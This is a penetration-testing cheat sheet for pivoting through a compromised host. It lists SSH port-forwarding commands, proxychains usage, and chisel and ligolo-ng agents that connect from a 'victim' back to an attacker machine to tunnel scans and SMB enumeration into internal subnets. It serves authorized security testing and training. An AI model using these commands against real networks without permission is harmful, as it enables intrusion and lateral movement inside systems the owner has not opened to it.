CyberCheatsheets

Pivoting & Tunneling Cheat Sheet

SSH tunneling, port forwarding, SOCKS proxies, and pivoting with chisel/ligolo to reach internal networks during authorized engagements.

Network & Protocollateral-movementpivotingport-forwardingproxychainsssh-tunnelingUpdated 2026-06-17

Overview

Pivoting routes your traffic through a compromised host to reach networks you can't touch directly. The core primitives are local, remote, and dynamic (SOCKS) port forwarding. SSH covers most cases; chisel and ligolo-ng handle Windows and restrictive environments. Pair a SOCKS proxy with proxychains to run any tool through the tunnel.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

SSH local forwarding (-L)

Reach the pivot's localhost:80 via your localhost:8080

ssh -L 8080:127.0.0.1:80 user@pivot

Reach an internal host (10.0.0.5) behind the pivot

ssh -L 3306:10.0.0.5:3306 user@pivot

Bind to all interfaces so teammates can use it

ssh -L 0.0.0.0:8080:10.0.0.5:80 user@pivot

SSH remote forwarding (-R)

Expose a service on the victim back to your box (e.g. catch a reverse shell)

ssh -R 9001:127.0.0.1:9001 user@yourbox

Remote dynamic SOCKS — proxy from your box into the victim's network

ssh -R 1080 user@yourbox

SSH dynamic SOCKS (-D)

Open a SOCKS proxy on :1080 routing through the pivot

ssh -D 1080 user@pivot

Background it (-f), no shell (-N)

ssh -D 1080 -N -f user@pivot

Run tools through the SOCKS proxy

proxychains nmap -sT -Pn 10.0.0.0/24

proxychains setup

Set 'socks5 127.0.0.1 1080' at the end of the config

grep -E 'socks|dynamic' /etc/proxychains4.conf

Quiet mode through the proxy

proxychains -q curl http://10.0.0.5/

Tunnel SMB enumeration into the internal net

proxychains crackmapexec smb 10.0.0.0/24

chisel (when SSH isn't available)

On your box: start the chisel server

chisel server -p 8000 --reverse

On the victim: reverse SOCKS back to you (proxy on :1080)

chisel client 10.10.14.5:8000 R:socks

Reverse port-forward a single internal service

chisel client 10.10.14.5:8000 R:3306:10.0.0.5:3306

ligolo-ng (modern, no proxychains)

On your box: start the ligolo proxy

./proxy -selfcert -laddr 0.0.0.0:11601

On the victim: connect the agent

./agent -connect 10.10.14.5:11601 -ignore-cert

On your box: bring up the tun interface and route the target subnet

sudo ip route add 10.0.0.0/24 dev ligolo  # then 'start' in the ligolo session

Tips

  • -L pulls a remote service to you; -R pushes a local service to them; -D gives a SOCKS proxy for everything.
  • proxychains only handles TCP and full connect scans — use nmap -sT -Pn through SOCKS.
  • ligolo-ng routes a whole subnet over a tun interface, so tools work natively (no proxychains).
  • Chain pivots: a second SOCKS through the first reaches networks two hops deep.

References

Aide-mémoires similaires